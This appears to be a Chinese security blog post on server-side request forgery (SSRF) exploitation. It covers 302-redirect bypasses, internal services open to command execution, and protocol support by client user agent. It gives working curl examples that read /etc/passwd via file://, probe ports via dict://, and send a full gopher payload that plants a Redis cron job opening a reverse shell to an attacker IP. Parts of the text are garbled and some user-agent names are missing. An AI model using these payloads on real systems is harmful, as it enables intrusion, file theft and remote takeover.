首先說一下302跳轉，豬豬俠烏云上提出的，可繞過ssrf一些利用限制

支持http(s)協(xié)議的除了可以探測內網web服務，還可以對內網服務發(fā)起所有基于Web請求類型漏洞攻擊，比如

ShellShock命令執(zhí)行

JBOSS遠程Invoker war命令執(zhí)行

Java調試接口命令執(zhí)行

axis2-admin部署Server命令執(zhí)行

Jenkins Scripts接口命令執(zhí)行

Confluence SSRF

Struts2命令執(zhí)行

counchdb WEB API遠程命令執(zhí)行

mongodb SSRF

docker API遠程命令執(zhí)行

php_fpm/fastcgi 命令執(zhí)行

tomcat命令執(zhí)行

Elasticsearch引擎Groovy腳本命令執(zhí)行

WebDav PUT上傳任意文件

WebSphere Admin可部署war間接命令執(zhí)行

Apache Hadoop遠程命令執(zhí)行

zentoPMS遠程命令執(zhí)行

HFS遠程命令執(zhí)行

glassfish任意文件讀取

war文件部署間接命令執(zhí)行

?等等.......

我們可以以不同ua分別說明情況

當接受的請求ua為curl

時，它支持的協(xié)議會有

利用姿勢，前輩文章很多，只簡單舉例

利用file協(xié)議讀取文件

curl -v?'http://xxx.com/ssrf.php?url=file:///etc/passwd'

利用dict協(xié)議查看端口

curl?-v?'http://xxx.com/ssrf.php?url=dict://127.0.0.1:22'

利用gopher協(xié)議攻擊redis反彈shell

curl

-v

‘http://xxx.com/ssrf.php?url=gopher%3A%2F%2F127.0.0.1%3A6379%2F_%2A3%250d%250a%243%250d%250aset%250d%250a%241%250d%250a1%250d%250a%2456%250d%250a%250d%250a%250a%250a%2A%2F1%20%2A%20%2A%20%2A%20%2A%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fyour

ip%2F2333%200%3E%261%250a%250a%250a%250d%250a%250d%250a%250d%250a%2A4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%243%250d%250adir%250d%250a%2416%250d%250a%2Fvar%2Fspool%2Fcron%2F%250d%250a%2A4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%2410%250d%250adbfilename%250d%250a%244%250d%250aroot%250d%250a%2A1%250d%250a%244%250d%250asave%250d%250a%2A1%250d%250a%244%250d%250aquit%250d%250a'

攻擊fastcgi等等

當ua為

實例環(huán)境

一般默認情況支持協(xié)議為HTTP[S],支持302跳轉

當ua為

實例環(huán)境

一般默認情況支持協(xié)議為HTTP[S]，file,支持302跳轉

當ua為

默認支持HTTP(s),支持302跳轉

可能少見?在用phantomjs ?直接渲染頁面的時候?可以讀取本地文件

Poc：

這里用ceye去接受請求，然后base64就是文件內容

當ua為ATS/6.0.0或者Apache Traffic Server/x.x.x ，默認支持http(s),不支持302跳轉,可內網探測，可對內網服務發(fā)起所有基于Web請求類型漏洞攻擊,大廠可能用的多一些。

如有錯誤，歡迎指正。